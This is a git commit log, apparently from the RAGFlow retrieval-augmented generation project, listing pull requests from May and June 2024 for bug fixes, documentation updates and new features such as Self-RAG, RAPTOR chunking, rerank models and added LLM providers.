### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-07 09:56:14 +08:00
2ff1b410b9 Update .env 2024-06-07 09:09:38 +08:00
f65d6a957b Updated Ollama part of local deployment (#1066)
### What problem does this PR solve?

#720 

### Type of change

- [x] Documentation Update
2024-06-07 09:06:46 +08:00
722c342d56 fix: bug similarity() in YoudaoRerank (#1084)
### What problem does this PR solve?

bug fix

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-07 09:04:53 +08:00
dbdae8e83c feat: add FlowChatBox #918 (#1086)
### What problem does this PR solve?

feat: add FlowChatBox #918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 19:29:36 +08:00
6399a4fde2 Update README.md 2024-06-06 16:06:20 +08:00
631753f1a9 documentaion for self-rag (#1080)
### What problem does this PR solve?

#1069 
### Type of change

- [x] Documentation Update
2024-06-06 16:04:37 +08:00
ad87825a1b The interface supported by Traditional Chinese is not complete #1074 (#1082)
### What problem does this PR solve?

The interface supported by Traditional Chinese is not complete #1074

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-06 16:03:52 +08:00
b04f0510f9 feat: modify the chinese translation of self-rag #1069 (#1081)
### What problem does this PR solve?

feat: modify the chinese translation of self-rag #1069

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 15:57:58 +08:00
1552dca28d feat: support Self-RAG #1069 (#1079)
### What problem does this PR solve?

feat: support Self-RAG #1069
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-06 15:30:51 +08:00
db35e9df4f feat: run flow (#1076)
### What problem does this PR solve?

feat: run flow #918 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 15:00:37 +08:00
d9dc183a0e rm wrongly uploaded py (#1073)
### What problem does this PR solve?


### Type of change


- [x] Refactoring
2024-06-06 13:49:48 +08:00
195498daaa feat: Support Password Access for ElasticSearch (#1072)
### What problem does this PR solve?

Using password authentication to access ElasticSearch is essential,
especially in a production environment.

This PR will enable password access support.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 13:19:26 +08:00
4454ba7a1e add self-rag (#1070)
### What problem does this PR solve?

#1069 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 11:13:39 +08:00
72c6784ff8 feat: fetch flow (#1068)
### What problem does this PR solve?
feat: fetch flow #918 
feat: save graph

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-06-06 11:01:14 +08:00
b6980d8a16 add version to package volcengine (#1062)
### What problem does this PR solve?

#992 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-05 12:18:36 +08:00
39ac3b1e60 feat: add custom edge (#1061)
### What problem does this PR solve?
feat: add custom edge
feat: add flow card
feat: add store for canvas
#918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-05 10:46:06 +08:00
b8eedbdd86 refine rerank (#1056)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-04 17:27:00 +08:00
8295979bb2 delete SDK repo and edit readme (#1054)
### What problem does this PR solve?

delete SDK repo and edit readme

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-04 11:13:26 +08:00
037657c1ce fix: change the address of the ollama document (#1043)
### What problem does this PR solve?

fix: change the address of the ollama document #1042

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-04 10:42:55 +08:00
4fba0427eb added delete_dataset method (#1051)
### What problem does this PR solve?

Added delete_dataset method and test for it.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-06-04 09:50:47 +08:00
c74d4d683e Update SDK->sdk, and add create_dataset (#1047)
### What problem does this PR solve?

Add create_dataset method, test for it, and update SDK->sdk.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Signed-off-by: cecilia-uu <konghui1996@163.com>
2024-06-03 20:14:47 +08:00
0b15c47d70 [doc] Updated document on max map count (#1037)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-06-03 17:01:02 +08:00
7d41de42a1 create the python sdk to return version (#1039)
### What problem does this PR solve?

Create python SDK to return the version of RAGFlow.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: cecilia-uu <konghui1996@163.com>
2024-06-03 15:59:50 +08:00
9517a27844 fix: fixed the problem that the api will be called directly after selecting the chat assistant picture (#1034)
### What problem does this PR solve?

fix: fixed the problem that the api will be called directly after
selecting the chat assistant picture #1033

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-03 13:42:56 +08:00
cc064040a2 refine API request data processing (#1031)
### What problem does this PR solve?

#1024 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-06-03 09:02:25 +08:00
cdea1d0a85 Update readme and add license (#1018)
### What problem does this PR solve?

- Update readme
- Add license

### Type of change

- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-06-01 16:24:10 +08:00
1de31ca9f6 refine file select code (#1021)
### What problem does this PR solve?

#1015 

### Type of change

- [x] Refactoring
2024-05-31 19:44:33 +08:00
4ec845c0a6 Add API for moving files (#1016)
### What problem does this PR solve?

Add backend API support for moving files into another directory

### Type of change
- [x] New Feature (non-breaking change which adds functionality)
2024-05-31 18:11:25 +08:00
c58a1c48eb Fix: bug #991 (#1013)
### What problem does this PR solve?

issue #991

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: KevinHuSh <kevinhu.sh@gmail.com>
2024-05-31 18:03:47 +08:00
fefe7124a1 Update README (#1014)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-31 17:53:06 +08:00
ebdc283cd5 Update README_zh.md,typo (#997)
typo

### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-31 16:44:59 +08:00
260c68f60c Adding the Minimax model (#1009)
### What problem does this PR solve?

Added support for MiniMax LLM

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: cecilia-uu <konghui1996@163.com>
2024-05-31 16:38:53 +08:00
5d2f7136dd fix chunk modification bug (#1011)
### What problem does this PR solve?

As title.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-31 15:45:11 +08:00
GYH
b85c15cc96 Add file rag/svr/discord_svr.py (#1008)
### What problem does this PR solve?

The file rag/svr/discord_svr.py is for the Discord bot.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-31 13:47:15 +08:00
9ed0e50f6b Update info (#1005)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Refactoring

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-31 09:53:04 +08:00
b9bb11879f fix #994 (#1006)
### What problem does this PR solve?

#994 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-31 09:46:22 +08:00
dc7afe46fb fix bug 994 ,991 (#1004)
### What problem does this PR solve?

#994 
#991 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-31 09:24:24 +08:00
4f4d8baf49 Update README (#1001)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-30 19:17:58 +08:00
83803a72ee fix ollama bug (#999)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 18:03:36 +08:00
c3c2515691 Update README (#998)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-30 18:00:02 +08:00
117a173fff fix tk_count undefine issue (#996)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 16:18:15 +08:00
77363a0875 fix bge rerank normalize issue (#988)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 12:55:17 +08:00
843720f958 fix bug in pdf parser (#986)
### What problem does this PR solve?

#963 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 11:47:36 +08:00
f077b57f8b set ollama keep_alive (#985)
### What problem does this PR solve?

#980 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 11:27:58 +08:00
c62834f870 fix: fixed the issue of error reporting when saving chat configuration #965 (#984)
### What problem does this PR solve?

fix: fixed the issue of error reporting when saving chat configuration
#965

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 11:10:54 +08:00
0171082cc5 fix create dialog bug (#982)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 09:25:05 +08:00
8dd45459be Add support for HTML file (#973)
### What problem does this PR solve?

Add support for HTML file

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-30 09:12:55 +08:00
dded365b8d Fix:After being idle for a while, new tasks need to be cancel and redo (#958)
### What problem does this PR solve?

After the service has been idle for a while (that is, once the Redis queue
exceeds the SVR_QUEUE_RETENTION (60*60) expiration time), new tasks need to
be cancelled and redone.

When xgroup_create is used to create a consumer group with the ID set to "$",
only messages added to the stream after the group is created are visible to
new consumers. If the application needs to process messages that already
exist in the queue, change this ID to "0" so that the new consumer group
reads all messages from the beginning.
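
The difference between the two start IDs can be illustrated with a toy in-memory model. This is only a sketch of the semantics described above, not a Redis client and not the code from this PR; `ToyStream` and its methods are hypothetical names. With a real server, the group would be created through the client's `xgroup_create` call instead.

```python
class ToyStream:
    """In-memory stand-in for a Redis stream; not a Redis client."""

    def __init__(self):
        self.entries = []  # messages in arrival order
        self.groups = {}   # group name -> index of the next entry to deliver

    def add(self, message):
        self.entries.append(message)

    def create_group(self, name, start_id):
        # "$" starts after the current last entry; "0" starts from the beginning.
        if start_id == "$":
            self.groups[name] = len(self.entries)
        elif start_id == "0":
            self.groups[name] = 0
        else:
            raise ValueError("this toy model only supports '$' and '0'")

    def read_new(self, name):
        # Deliver everything the group has not seen yet.
        start = self.groups[name]
        self.groups[name] = len(self.entries)
        return self.entries[start:]


stream = ToyStream()
stream.add("task-1")                      # queued before any group exists
stream.create_group("late_group", "$")    # sees only later messages
stream.create_group("replay_group", "0")  # sees the whole backlog
stream.add("task-2")                      # queued after both groups exist

late = stream.read_new("late_group")
replayed = stream.read_new("replay_group")
```

In this model `late` contains only the task queued after the group was created, while `replayed` also contains the backlog.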


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-30 09:03:11 +08:00
9fdd517af6 Update README.md (#978)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-29 20:22:41 +08:00
2604ded2e4 Update README.md (#976)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-29 20:02:16 +08:00
758eb03ccb fix jina adding issure and term weight refinement (#974)
### What problem does this PR solve?

#724 #162

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
2024-05-29 19:38:57 +08:00
e0d05a3895 fix: if the conversation name is too long, it will overflow the current item. #607 (#972)
### What problem does this PR solve?

fix: if the conversation name is too long, it will overflow the current
item. #607

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-29 18:32:03 +08:00
614defec21 add rerank model (#969)
### What problem does this PR solve?

feat: add rerank models to the project #724 #162

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-29 16:50:02 +08:00
e1f0644deb feat: add jina (#967)
### What problem does this PR solve?
feat: add jina #650 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-29 16:48:52 +08:00
a135f9f5b6 feat: add rerank models to the project #724 #162 (#966)
### What problem does this PR solve?

Vector similarity weight is displayed incorrectly #965
feat: add rerank models to the project #724 #162
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-29 16:19:08 +08:00
daa4799385 limit the system context length of conversation messages. (#962)
### What problem does this PR solve?

#951 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-29 10:40:07 +08:00
495a6434ec feat: add FlowHeader and delete edge (#959)
### What problem does this PR solve?
feat: add FlowHeader and delete edge #918 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-29 10:01:39 +08:00
21aac545d9 Expanded the supported LLM list (#960)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-28 20:13:03 +08:00
0f317221b4 Update README (#956)
### What problem does this PR solve?

Update README to reflect support for new LLMs.

### Type of change

- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-28 20:05:02 +08:00
a427672229 Fixed a docusaurus display issue (#954)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update

---------

Co-authored-by: KevinHuSh <kevinhu.sh@gmail.com>
2024-05-28 17:26:13 +08:00
196f2b445f fix: fixed the issue of 404 error in the user settings page of the demo site (#948)
### What problem does this PR solve?

fix: fixed the issue of 404 error in the user settings page of the demo
site #947

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-28 11:22:56 +08:00
5041677f11 Add umap-learn, fasttext and volcengine in requirements_arm.txt (#945)
### What problem does this PR solve?

Complete the requirements for ARM

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-28 11:13:48 +08:00
7eee193956 fix #917 #915 (#946)
### What problem does this PR solve?

#917 
#915

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-28 11:13:02 +08:00
9ffd7ae321 Added support for Baichuan LLM (#934)
### What problem does this PR solve?

- Added support for Baichuan LLM

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

Co-authored-by: 海贼宅 <stu_xyx@163.com>
2024-05-28 09:09:37 +08:00
ec6ae744a1 minor editorial updates for clarity (#941)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-27 20:35:08 +08:00
d9bc093df1 feat: test buildNodesAndEdgesFromDSLComponents (#940)
### What problem does this PR solve?
 feat: test buildNodesAndEdgesFromDSLComponents #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-27 19:35:14 +08:00
571aaaff22 Add Dockerfile and requirements.txt for arm (#936)
### What problem does this PR solve?

#253 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-27 19:34:49 +08:00
GYH
7d8e03ec38 Update docnm_kwd to doc_name (#939)
### What problem does this PR solve?

Update docnm_kwd to doc_name 
#908 

### Type of change


- [x] Refactoring
2024-05-27 19:14:04 +08:00
65677f65c9 Updated RESTful API Reference (#908)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-27 18:34:16 +08:00
89d296feab Remove duplicated FROM. (#935)
### What problem does this PR solve?
Remove duplicated FROM in Dockerfile.cuda.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-27 17:16:47 +08:00
3ae8a87986 Expanded list of locally deployed embedding models (#930)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Documentation Update
2024-05-27 14:01:52 +08:00
46454362d7 fix raptor bugs (#928)
### What problem does this PR solve?

#922 
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-27 11:01:20 +08:00
55fb96131e feat: build react flow nodes and edges from mock data #918 (#919)
### What problem does this PR solve?
feat: build react flow nodes and edges from mock data #918

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-27 08:21:30 +08:00
20b57144b0 syntax error (#924)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-27 08:20:32 +08:00
9e3a0e4d03 The fasttext library is missing, and it is used in the operators.py file. (#925)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-27 08:18:47 +08:00
c0d71adaa2 Bug fix for volcengine (#909)
### What problem does this PR solve?
Bug fixes for the VolcEngine

- Bug fix for front-end configuration code of VolcEngine

- Bug fix for tokens counting logic of VolcEngine


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: 海贼宅 <stu_xyx@163.com>
2024-05-24 11:34:39 +08:00
735bdf06a4 Update README (#901)
### What problem does this PR solve?

Update README to reflect the RAPTOR implementation.

### Type of change

- [x] Documentation Update

---------

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-24 08:30:08 +08:00
fe18627ebc Fix some syntax errors, re not import (#904)
The `re` module was not imported.

### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-23 19:38:13 +08:00
4cda40c3ef feat: fixed issue with threshold translation #882 and add NodeContextMenu (#906)
### What problem does this PR solve?

feat: fixed issue with threshold translation #882
feat: add NodeContextMenu

### Type of change


- [ ] New Feature (non-breaking change which adds functionality)
2024-05-23 18:53:04 +08:00
GYH
1e5c5abe58 Update api_md document/rm (#894)
### What problem does this PR solve?

Update api_md document/rm
#717 

### Type of change

- [x] Documentation Update
2024-05-23 15:19:58 +08:00
6f99bbbb08 add raptor (#899)
### What problem does this PR solve?

#882 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-23 14:31:16 +08:00
3bbdf3b770 fixbug for computing 'not concating feature' (#896)
### What problem does this PR solve?

When the PDF parser calls the `_naive_vertical_merge` method, the "not
concating feature" value should be computed from the difference between
the `layoutno` of `b` and `b_`, but the code actually compares `b` with
`b`. I think it's a bug, so this PR fixes it. Please check again.
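
The bug described above can be illustrated with a minimal sketch. The box representation (a dict with a `layoutno` key) and both function names are assumptions made for illustration only; this is not the parser's actual code.

```python
# Hypothetical sketch: boxes are modeled as dicts carrying a "layoutno" key.
# Only the name `layoutno` comes from the commit message; the rest is assumed.

def layout_differs_buggy(b: dict, b_: dict) -> bool:
    # Compares `b` with itself, so the feature can never be True.
    return b.get("layoutno", 0) != b.get("layoutno", 0)


def layout_differs_fixed(b: dict, b_: dict) -> bool:
    # Compares the current box `b` with the following box `b_`.
    return b.get("layoutno", 0) != b_.get("layoutno", 0)
```

With the self-comparison, a feature meant to block merging across layout regions is always false, which is why the fix matters even though it is a one-character change.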

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-23 14:29:42 +08:00
070b53f3bf feat: RAPTOR is not displayed when the parsing method is picture. (#897)
### What problem does this PR solve?

Implements RAPTOR for better chunking #882

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-05-23 14:13:09 +08:00
eb51ad73d6 Add support for VolcEngine - the current version supports SDK2 (#885)
- The main idea is to assemble **ak**, **sk**, and **ep_id** into a
dictionary and store it in the database's **api_key** field.
- I don’t know much about the front end, so I modeled it on the Ollama
integration; parts of it may be redundant.

### Configuration method

- model name
    - Format requirements: {"VolcEngine model name":"endpoint_id"}
    - For example: {"Skylark-pro-32K":"ep-xxxxxxxxx"}

- Volcano ACCESS_KEY
    - Format requirements: VOLC_ACCESSKEY of the volcano engine
      corresponding to the model

- Volcano SECRET_KEY
    - Format requirements: VOLC_SECRETKEY of the volcano engine
      corresponding to the model
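
As a rough sketch of the idea described above (assembling **ak**, **sk**, and **ep_id** into a dictionary stored in the **api_key** field), the following assumes the dictionary is serialized as JSON. The serialization format and both helper names are assumptions, not something this PR confirms.

```python
import json

# Keys named in the PR description; JSON as the storage format is an assumption.
REQUIRED_KEYS = {"ak", "sk", "ep_id"}


def pack_volc_credentials(ak: str, sk: str, ep_id: str) -> str:
    """Bundle the three values into one string suitable for a single field."""
    return json.dumps({"ak": ak, "sk": sk, "ep_id": ep_id})


def unpack_volc_credentials(api_key: str) -> dict:
    """Recover the three values, failing loudly if any of them is missing."""
    creds = json.loads(api_key)
    if not isinstance(creds, dict):
        raise ValueError("api_key does not contain a dictionary")
    missing = REQUIRED_KEYS - set(creds)
    if missing:
        raise ValueError(f"api_key is missing: {sorted(missing)}")
    return creds
```

Packing several values into one field avoids a schema change, at the cost of having to validate the contents whenever the field is read.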
    
### What problem does this PR solve?


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-23 11:15:29 +08:00
GYH
fbd0d74053 Add /api/document/rm function (#887)
### What problem does this PR solve?

Delete files from a knowledge base.

#717 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-23 10:32:56 +08:00
170186ee4d feat: remove the space before promptText (#886)
### What problem does this PR solve?

feat: remove the space before promptText #882 


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-22 18:36:55 +08:00
ed184ed87e Implements RAPTOR for better chunking #882 (#883)
### What problem does this PR solve?

Implements RAPTOR for better chunking #882

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-22 18:04:18 +08:00
GYH
43412571f7 Add api.md:/api/list_kb_docs/ description (#881)
### What problem does this PR solve?

Add api.md:/api/list_kb_docs/ description
#717 

### Type of change

- [x] Documentation Update
2024-05-22 17:37:11 +08:00
17489e6c6c fix import error (#877)
Fix import error for user_app.py

---------

Co-authored-by: yonghui li <yonghui.li@bondex.com.cn>
2024-05-22 16:14:53 +08:00
21453ffff0 fixed: The choices may be empty. (#876)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-22 15:29:07 +08:00
GYH
be13429d05 Add api/list_kb_docs function and modify api/list_chunks (#874)
### What problem does this PR solve?
#717 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-22 14:58:56 +08:00
5178daeeaf Fixed a format issue (#872)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-05-22 13:39:38 +08:00
d5b8d8e647 fixed a format issue for docusaurus publication (#871)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-05-22 12:45:34 +08:00
b62a20816e fix: display specific error message when previewing file error #868 (#869)
### What problem does this PR solve?

fix: display specific error message when previewing file error  #868


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-22 11:54:32 +08:00
3cae87a902 Reorganized docs for docusaurus publish (#860)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-05-21 20:53:55 +08:00
1797f5ce31 fix: the site domain name in the Chat Bot API is hardcoded. #776 (#859)
### What problem does this PR solve?

fix: the site domain name in the Chat Bot API is hardcoded. #776

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-21 17:37:19 +08:00
fe4b2e4670 Updated Launch service from source (#856)
### What problem does this PR solve?

Some nitpicking editorial updates.

### Type of change

- [x] Documentation Update
2024-05-21 16:43:58 +08:00
250119e03a Fix missing docker image version prefix v. (#855)
The variable RAGFLOW_VERSION in docker/.env should start with prefix v
to match docker image tag.
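
A minimal sketch of the rule stated above: a numeric version gets a `v` prefix so that it matches the image tag. The helper name is hypothetical, and leaving non-numeric values untouched is an assumption.

```python
def image_tag(version: str) -> str:
    """Return a tag with a leading 'v' when the version starts with a digit."""
    version = version.strip()
    # Only numeric versions such as "0.6.0" are prefixed; other values
    # are returned unchanged (an assumption, not confirmed by the PR).
    if version[:1].isdigit():
        return f"v{version}"
    return version
```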

### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-21 14:26:43 +08:00
bae376a479 Update db_models.py 2024-05-21 12:02:22 +08:00
6c32f80bc9 Update before release (#854)
### What problem does this PR solve?

Update version information before release 0.6.0.

### Type of change

- [x] Documentation Update

Signed-off-by: Jin Hai <haijin.chn@gmail.com>
2024-05-21 11:14:02 +08:00
7e74546b73 Set the language default value of the language based on the LANG envi… (#853)
…ronment variable at the initial creation.

1. Set the User's default language based on LANG;
2. Set the Knowledgebase's default language based on LANG; 
3. Set the default language of the Dialog based on LANG;
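
The three defaults above could all derive from one helper along these lines. This is a sketch under assumptions: the `zh` prefix check and the labels `"Chinese"` and `"English"` are illustrative and not taken from the PR.

```python
import os


def default_language(env=None) -> str:
    """Pick a default language label from the LANG environment variable."""
    env = os.environ if env is None else env
    lang = env.get("LANG", "")
    # Assumption: any locale starting with "zh" maps to Chinese,
    # and everything else (including an unset LANG) maps to English.
    return "Chinese" if lang.lower().startswith("zh") else "English"
```

Passing the environment as a parameter keeps the helper easy to test without touching the real process environment.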

### What problem does this PR solve?


### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
2024-05-21 11:05:41 +08:00
25781113f9 Updated how to handle stalled file parsing (#851)
### What problem does this PR solve?

Refresh file parsing if it is stalled.

### Type of change

- [x] Documentation Update
2024-05-21 09:03:30 +08:00
16fa7db737 Create start_chat.md (#836)
### What problem does this PR solve?

Added instructions on how to set up an AI chat in RAGFlow.

### Type of change

- [x] Documentation Update
2024-05-20 20:06:17 +08:00
a12fcf9156 fix minio helth bug (#850)
### What problem does this PR solve?

#643 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-20 19:35:30 +08:00
GYH
c27c02ea67 Split Excel file into different chunks (#847)
### What problem does this PR solve?

Split an Excel file into separate chunks.

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-20 18:35:15 +08:00
71068895ae Set the number of task_executor processes through the environment variable WS. (#846)
### What problem does this PR solve?


### Type of change

- [x] Other (please describe): Use an environment variable to control the
number of task executor processes.
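
As a sketch of how a `WS` value might be read safely, the helper below parses the variable and falls back to a single process. The function name and the fallback of 1 are assumptions; the PR only states that `WS` sets the number of task_executor processes.

```python
import os


def worker_count(env=None, default: int = 1) -> int:
    """Read the number of task executor processes from the WS variable."""
    env = os.environ if env is None else env
    raw = env.get("WS", "")
    try:
        count = int(raw)
    except ValueError:
        # Unset or non-numeric values fall back to the default (assumed to be 1).
        return default
    return count if count >= 1 else default
```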
2024-05-20 18:32:24 +08:00
93b35f4e58 feat: display the version and backend service status on the page (#848)
### What problem does this PR solve?

#643 feat: display the version and backend service status on the page

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-05-20 18:28:36 +08:00
9a01d1b876 The default max tokens of 215 is too small, answers are often cut off.I will modify it to 512 to address this issue. (#845)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
2024-05-20 17:25:19 +08:00
a7bd427116 add locally deployed llm (#841)
### What problem does this PR solve?


### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-20 12:40:59 +08:00
2b36283712 fix english query bug (#840)
### What problem does this PR solve?

#834 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-20 12:23:51 +08:00
6683179d6a fix bug about removing KB. (#839)
### What problem does this PR solve?

#838 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-20 09:23:57 +08:00
673a28e492 fix bug of chat without stream (#830)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 20:03:00 +08:00
2bfacd0469 refine doc about API: completion (#829)
### What problem does this PR solve?
#808 

### Type of change

- [x] Documentation Update
2024-05-17 18:06:20 +08:00
b3c923da6b add doc ids in API: completion (#827)
### What problem does this PR solve?
#808 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-17 17:51:54 +08:00
a1586e0af9 correct mismatched kb doc number (#826)
### What problem does this PR solve?

#620

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 17:27:39 +08:00
f6a599461f fix zhipuAI stream issue (#825)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 17:07:33 +08:00
GYH
081f922ee6 0517 list chunks (#821)
### What problem does this PR solve?

#717 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-05-17 15:58:05 +08:00
9f0f5b45cc Default language will be given according to the browse setting and also can be configured #801 (#823)
### What problem does this PR solve?

The default language follows the browser setting and can also be
configured. #801

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-05-17 15:38:28 +08:00
a2a6a35e94 fix doc number miss-match issue (#822)
### What problem does this PR solve?

#620 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 15:35:09 +08:00
9e5d501e83 fix data init error (#820)
### What problem does this PR solve?

#810 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 14:33:19 +08:00
4ca176bd41 fix: thumbnails are too large in the chat box #818 (#819)
### What problem does this PR solve?

fix: thumbnails are too large in the chat box #818

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 14:16:55 +08:00
c3bc72dfd9 fix too large thumbnail issue (#817)
### What problem does this PR solve?

#709

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-05-17 14:04:21 +08:00
